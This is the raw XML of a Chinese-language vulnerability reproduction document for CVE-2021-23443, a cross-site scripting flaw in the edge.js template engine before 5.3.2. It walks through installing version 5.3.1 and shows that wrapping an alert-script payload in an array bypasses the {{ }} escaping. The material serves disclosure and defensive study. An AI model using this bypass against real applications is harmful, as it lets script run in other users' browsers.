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漏洞名称：edge.js 跨站脚本漏洞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编号：CNNVD-202109-1534</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CVE 编号：CVE-2021-23443</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">厂商：个人开发者</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">危害等级：低危</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">漏洞类型：跨站脚本</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">收录时间：2021-09-21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更新时间：2022-05-05 00:00:00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">edge.js 是 Node.js 模板引擎。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">edge.js 5.3.2 之前存在安全漏洞，当要呈现的输入是数组（而不是字符串或 SafeValue）时，即使使用了 {{ }}，类型混淆漏洞也可用于绕过输入清理。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node v20.2.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">yarn v1.22.19</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">edge.js v5.3.1</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkStart w:id="32" w:name="漏洞还原详细步骤"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">漏洞还原详细步骤</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="22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CVE-2021-23443</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">指令新建目录用于测试。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init</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">创建新的 nodejs 项目。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edge.js@5.3.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">安装带有缺陷的 edge.js 版本。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="22"/>
    <w:bookmarkStart w:id="23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新建文件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，写入以下代码：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join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"edge.js"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greeting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"&lt;script&gt;alert('xss')&lt;/script&gt;"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(html)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创建文件</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">views/welcome.edge</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">，写入以下内容：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/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{{ greeting }}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="23"/>
    <w:bookmarkStart w:id="27" w:name="执行程序"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. 执行程序</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">我们使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">node index.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">运行程序，可以看到程序按照预期输出了经过过滤的 HTML 文本。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="813109"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="result1" title="" id="25" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="./figure/resul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result1</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkStart w:id="31" w:name="验证漏洞"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. 验证漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">修改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，我们将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">greeting: ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">后面的内容用数组括起来。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join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"edge.js"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greeting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"&lt;script&gt;alert('xss')&lt;/script&gt;"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(html)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再次执行代码，可以看到 HTML 过滤被成功绕过。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4238625" cy="942975"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="result2" title="" id="29" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="./figure/result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result2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2023-05-29T01:03:18Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-29T01:03:18Z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